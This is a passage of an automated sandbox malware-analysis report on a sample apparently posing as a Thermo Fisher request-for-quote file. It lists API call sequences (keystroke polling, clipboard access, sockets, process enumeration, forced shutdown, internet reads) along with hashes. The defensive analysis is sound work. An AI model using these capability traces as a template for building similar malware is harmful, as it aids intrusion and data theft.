                                                              • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 006633C5
                                                              • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00663604
                                                              • RegCloseKey.ADVAPI32(00000000), ref: 00663611
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                                                              • String ID:
                                                              • API String ID: 1240663315-0
                                                              • Opcode ID: a6e19c7ab1daf79c4ea4d81a040e4ceddf494f849200b19ee3135716d94c2669
                                                              • Instruction ID: 1f8938ab79b45d0dedbedebaa8c401540fab42815551de4a6266228a7b08caf2
                                                              • Opcode Fuzzy Hash: a6e19c7ab1daf79c4ea4d81a040e4ceddf494f849200b19ee3135716d94c2669
                                                              • Instruction Fuzzy Hash: EBE14A71604210AFCB55DF28C991E6BBBEAEF88314B04856DF44ADB3A1DB30EE05CB55
                                                              APIs
                                                              • GetKeyboardState.USER32(?), ref: 00642B5F
                                                              • GetAsyncKeyState.USER32(000000A0), ref: 00642BE0
                                                              • GetKeyState.USER32(000000A0), ref: 00642BFB
                                                              • GetAsyncKeyState.USER32(000000A1), ref: 00642C15
                                                              • GetKeyState.USER32(000000A1), ref: 00642C2A
                                                              • GetAsyncKeyState.USER32(00000011), ref: 00642C42
                                                              • GetKeyState.USER32(00000011), ref: 00642C54
                                                              • GetAsyncKeyState.USER32(00000012), ref: 00642C6C
                                                              • GetKeyState.USER32(00000012), ref: 00642C7E
                                                              • GetAsyncKeyState.USER32(0000005B), ref: 00642C96
                                                              • GetKeyState.USER32(0000005B), ref: 00642CA8
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: State$Async$Keyboard
                                                              • String ID:
                                                              • API String ID: 541375521-0
                                                              • Opcode ID: cc66e3f52d8d6ffd56b81890858f651ad0d0497c6ee945f0aa74a69de62afb0f
                                                              • Instruction ID: acfb4a7e60bd4f8816f476ab4f6f9051f75e69cdb3037efad89a6b79c3f06db7
                                                              • Opcode Fuzzy Hash: cc66e3f52d8d6ffd56b81890858f651ad0d0497c6ee945f0aa74a69de62afb0f
                                                              • Instruction Fuzzy Hash: 1C41E7305047CB6DFF709B6088A43F9BFA2AF11358FA4405AF9C6563C2DB9499C4C7A2
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                              • String ID:
                                                              • API String ID: 1737998785-0
                                                              • Opcode ID: 90851d44e5929709f42f18436025d3fab6f480abdde1398c86a5af1be4db7a56
                                                              • Instruction ID: 6e30e869504aecaafadff10f6cc7674dabc20530beb0806579f3d8b1ca79eed8
                                                              • Opcode Fuzzy Hash: 90851d44e5929709f42f18436025d3fab6f480abdde1398c86a5af1be4db7a56
                                                              • Instruction Fuzzy Hash: 6A219A31300115AFDB40AF24DC59B6DB7ABEF04721F049619F90ADB2A1DB30ED41CBA8
                                                              APIs
                                                                • Part of subcall function 00639ABF: CLSIDFromProgID.OLE32 ref: 00639ADC
                                                                • Part of subcall function 00639ABF: ProgIDFromCLSID.OLE32(?,00000000), ref: 00639AF7
                                                                • Part of subcall function 00639ABF: lstrcmpiW.KERNEL32(?,00000000), ref: 00639B05
                                                                • Part of subcall function 00639ABF: CoTaskMemFree.OLE32(00000000,?,00000000), ref: 00639B15
                                                              • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 0065C235
                                                              • _memset.LIBCMT ref: 0065C242
                                                              • _memset.LIBCMT ref: 0065C360
                                                              • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000001), ref: 0065C38C
                                                              • CoTaskMemFree.OLE32(?), ref: 0065C397
                                                              Strings
                                                              • NULL Pointer assignment, xrefs: 0065C3E5
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
                                                              • String ID: NULL Pointer assignment
                                                              • API String ID: 1300414916-2785691316
                                                              • Opcode ID: ba9ec18b920f45544937e465be9cdb9c5b10e256aa20c9f6beacab0ab310e196
                                                              • Instruction ID: 9b83d54f85b8c41539e322367a9d9f27405158287baddb179d9c5679e36db544
                                                              • Opcode Fuzzy Hash: ba9ec18b920f45544937e465be9cdb9c5b10e256aa20c9f6beacab0ab310e196
                                                              • Instruction Fuzzy Hash: E2912B71D00218AFDB10DF94DC95EDEBBBAEF08720F10815AF915A7291EB709A45CFA4
                                                              APIs
                                                                • Part of subcall function 0063B134: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0063B180
                                                                • Part of subcall function 0063B134: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0063B1AD
                                                                • Part of subcall function 0063B134: GetLastError.KERNEL32 ref: 0063B1BA
                                                              • ExitWindowsEx.USER32(?,00000000), ref: 00647A0F
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                              • String ID: $@$SeShutdownPrivilege
                                                              • API String ID: 2234035333-194228
                                                              • Opcode ID: 4596d37477dd8d6b52dc482a0d58dbf2c9dd72b9680f0dd893bc5a70c679f4dc
                                                              • Instruction ID: 683c17ca4e7499b2d61b661b46b58e15c06d280d00d32938572250db0d051c92
                                                              • Opcode Fuzzy Hash: 4596d37477dd8d6b52dc482a0d58dbf2c9dd72b9680f0dd893bc5a70c679f4dc
                                                              • Instruction Fuzzy Hash: CE01F7716582216AF7282664CC5ABFF775F9B00340F141524F943A22C2DB609E4192B5
                                                              APIs
                                                              • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00658CA8
                                                              • WSAGetLastError.WSOCK32(00000000), ref: 00658CB7
                                                              • bind.WSOCK32(00000000,?,00000010), ref: 00658CD3
                                                              • listen.WSOCK32(00000000,00000005), ref: 00658CE2
                                                              • WSAGetLastError.WSOCK32(00000000), ref: 00658CFC
                                                              • closesocket.WSOCK32(00000000,00000000), ref: 00658D10
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: ErrorLast$bindclosesocketlistensocket
                                                              • String ID:
                                                              • API String ID: 1279440585-0
                                                              • Opcode ID: 485e7361ea4f791b4a9c03ca78e26732ede2dd3df71102381be7fc0d73aab51d
                                                              • Instruction ID: 69d5d7917e4fc57e143803dcdc84c178168161a734f38229d0ea1c4508f450bd
                                                              • Opcode Fuzzy Hash: 485e7361ea4f791b4a9c03ca78e26732ede2dd3df71102381be7fc0d73aab51d
                                                              • Instruction Fuzzy Hash: 3721D031600200AFCB54EF68CD45BAEB7ABEF48321F14825CF956A73D2CB70AD458B65
                                                              APIs
                                                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 00646554
                                                              • Process32FirstW.KERNEL32(00000000,0000022C), ref: 00646564
                                                              • Process32NextW.KERNEL32(00000000,0000022C), ref: 00646583
                                                              • __wsplitpath.LIBCMT ref: 006465A7
                                                              • _wcscat.LIBCMT ref: 006465BA
                                                              • CloseHandle.KERNEL32(00000000,?,00000000), ref: 006465F9
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wsplitpath_wcscat
                                                              • String ID:
                                                              • API String ID: 1605983538-0
                                                              • Opcode ID: 0d3ac0d416629eddf206c8de9057e0222ccde867456f5213b26cb873e10edcb1
                                                              • Instruction ID: 2cf3cdd1de35143d4fabf61d28e4b2b3690ff55b36030228902fe2531088e957
                                                              • Opcode Fuzzy Hash: 0d3ac0d416629eddf206c8de9057e0222ccde867456f5213b26cb873e10edcb1
                                                              • Instruction Fuzzy Hash: 8A218771900218ABDB14ABA4DD88FDDB7BEAF45300F5004A9F545D7241D7719F85CF61
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: ERCP$VUUU$VUUU$VUUU$VUUU$j
                                                              • API String ID: 0-850748383
                                                              • Opcode ID: d2b5866301ef2168de9ccba7fcd8d754a8a3a9ce7697ea684e728eae1d3b0407
                                                              • Instruction ID: 2f1a7fb37955feb83fc0710a45f31f31f34443b96b5b3d9201cdaadc5bf73502
                                                              • Opcode Fuzzy Hash: d2b5866301ef2168de9ccba7fcd8d754a8a3a9ce7697ea684e728eae1d3b0407
                                                              • Instruction Fuzzy Hash: 65926E71E4021ACBDF28DF98C8507EEB7B3BB54354F1482AAD816AB381D7719D81CB61
                                                              APIs
                                                              • lstrlenW.KERNEL32(?,?,?,00000000), ref: 006413DC
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: lstrlen
                                                              • String ID: ($,2k$<2k$|
                                                              • API String ID: 1659193697-1977981825
                                                              • Opcode ID: 34b9830fa1c255a6e0bc21e53ff580813ad565990f8eee7e4cec3c83cf265943
                                                              • Instruction ID: 965b52a2e7389aae5d4a36ff99e00d0e64c5a3a4e74b1690674ae0a6259be742
                                                              • Opcode Fuzzy Hash: 34b9830fa1c255a6e0bc21e53ff580813ad565990f8eee7e4cec3c83cf265943
                                                              • Instruction Fuzzy Hash: 9F321675A007059FC728CF69C4809AAB7F1FF49320B15C56EE59ADB3A2E770E981CB44
                                                              APIs
                                                                • Part of subcall function 0065A82C: inet_addr.WSOCK32(00000000,00000000,?,?,?,00000000), ref: 0065A84E
                                                              • socket.WSOCK32(00000002,00000002,00000011,?,?,?,00000000), ref: 00659296
                                                              • WSAGetLastError.WSOCK32(00000000,00000000), ref: 006592B9
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: ErrorLastinet_addrsocket
                                                              • String ID:
                                                              • API String ID: 4170576061-0
                                                              • Opcode ID: 2f9ca39ebbab3ffc8442d3bf62a40d4f981a01540489ada8be3a7279564141cf
                                                              • Instruction ID: 7180ca2e28d0bb81e894bee1484b1a9cda5df504a51ee7a68918ac57a1899e1c
                                                              • Opcode Fuzzy Hash: 2f9ca39ebbab3ffc8442d3bf62a40d4f981a01540489ada8be3a7279564141cf
                                                              • Instruction Fuzzy Hash: 7E41C170600204AFDB54AB68C852EBE77EFEF44724F04854CFA56AB3C2DA749D418BA5
                                                              APIs
                                                              • FindFirstFileW.KERNEL32(?,?), ref: 0064EB8A
                                                              • _wcscmp.LIBCMT ref: 0064EBBA
                                                              • _wcscmp.LIBCMT ref: 0064EBCF
                                                              • FindNextFileW.KERNEL32(00000000,?), ref: 0064EBE0
                                                              • FindClose.KERNEL32(00000000,00000001,00000000), ref: 0064EC0E
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: Find$File_wcscmp$CloseFirstNext
                                                              • String ID:
                                                              • API String ID: 2387731787-0
                                                              • Opcode ID: ea5d0bed79b81a16d6928192a369a8f90cd58fca3e69a0f272e4232ef9c79fb3
                                                              • Instruction ID: b0ca5dbe6b9269110e2c05aa1586e16e2f05cffe2608aabccb19a8bc48017880
                                                              • Opcode Fuzzy Hash: ea5d0bed79b81a16d6928192a369a8f90cd58fca3e69a0f272e4232ef9c79fb3
                                                              • Instruction Fuzzy Hash: 0741CE756007029FC748DF28C4D0AAAB7E6FF49320F10455DE96A8B3A1DB32A980CF95
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                              • String ID:
                                                              • API String ID: 292994002-0
                                                              • Opcode ID: 8d9d44fd9d894d7b5ed25fd1444c11dd9bdae36a61a39079bd974f2b5450ab68
                                                              • Instruction ID: 6647aceaaa2d3a9dc9ca276850055aef920416873a018d27e0504724b8598e1f
                                                              • Opcode Fuzzy Hash: 8d9d44fd9d894d7b5ed25fd1444c11dd9bdae36a61a39079bd974f2b5450ab68
                                                              • Instruction Fuzzy Hash: 1611BF713002166FE7216F36DC44AAFBB9BEF56760B040629F849D7281DF30AD4286A9
                                                              APIs
                                                              • LoadLibraryA.KERNEL32(kernel32.dll,?,0061E014,75920AE0,0061DEF1,0069DC38,?,?), ref: 0061E02C
                                                              • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 0061E03E
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: AddressLibraryLoadProc
                                                              • String ID: GetNativeSystemInfo$kernel32.dll
                                                              • API String ID: 2574300362-192647395
                                                              • Opcode ID: 4b29836da67fbb7be8d032909664ead7980918e246b0ee94af384053f0693888
                                                              • Instruction ID: 65e142e75fba7cfb9677e9c94d593e1a31d275210608153e2b6b0bb42befbb79
                                                              • Opcode Fuzzy Hash: 4b29836da67fbb7be8d032909664ead7980918e246b0ee94af384053f0693888
                                                              • Instruction Fuzzy Hash: 7AD05EB0400713AEC7215B61E8186D277D6AF14701F19441AE8C192290DAB4D8C18760
                                                              APIs
                                                                • Part of subcall function 0061B34E: GetWindowLongW.USER32(?,000000EB), ref: 0061B35F
                                                              • DefDlgProcW.USER32(?,?,?,?,?), ref: 0061B22F
                                                                • Part of subcall function 0061B55D: DefDlgProcW.USER32(?,00000020,?,00000000), ref: 0061B5A5
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: Proc$LongWindow
                                                              • String ID:
                                                              • API String ID: 2749884682-0
                                                              • Opcode ID: f057316e8e91869bd2ff741df314f2cdb907f795386ae8ff65d25b5f719e6260
                                                              • Instruction ID: 1fa933d41255d7fc44331e63c1b1441a11fe94b8ec0528607092a93a59c7124b
                                                              • Opcode Fuzzy Hash: f057316e8e91869bd2ff741df314f2cdb907f795386ae8ff65d25b5f719e6260
                                                              • Instruction Fuzzy Hash: B1A1A070114004BAEB38AF2A5C89DFF295FEB4B344B1C911DF405D6396CB369E8AD276
                                                              APIs
                                                              • InternetQueryDataAvailable.WININET(?,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,006543BF,00000000), ref: 00654FA6
                                                              • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 00654FD2
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: Internet$AvailableDataFileQueryRead
                                                              • String ID:
                                                              • API String ID: 599397726-0
                                                              • Opcode ID: 02408031a34197a095b02570a79df5cea26c311de877fb5e051e6734fba715a2
                                                              • Instruction ID: d86324fbd81d0841bde43ce31eb2fdfcf51587c2d3eb74a5c1fa59f0706593e2
                                                              • Opcode Fuzzy Hash: 02408031a34197a095b02570a79df5cea26c311de877fb5e051e6734fba715a2
                                                              • Instruction Fuzzy Hash: 8041F971504605BFEB209E84DC85EFF77BEEB8031AF10406EFA0566280EB719E899764
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: _memmove
                                                              • String ID: \Qk
                                                              • API String ID: 4104443479-3811039747
                                                              • Opcode ID: 67a43dc52e3a104516fb2e7f5fdfd8e9185f76219a3baf1fd26926ee46bd2d07
                                                              • Instruction ID: fdb0ce00315255df1b38f9d5b5417a4d8ed87103695f313fd750453560f2eccb
                                                              • Opcode Fuzzy Hash: 67a43dc52e3a104516fb2e7f5fdfd8e9185f76219a3baf1fd26926ee46bd2d07
                                                              • Instruction Fuzzy Hash: D7A23E74E04219CFDB28CF58C4806EDB7B2FF58314F2582A9D859AB391D774AE82DB50
                                                              APIs
                                                              • SetErrorMode.KERNEL32(00000001), ref: 0064E20D
                                                              • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 0064E267
                                                              • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 0064E2B4
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
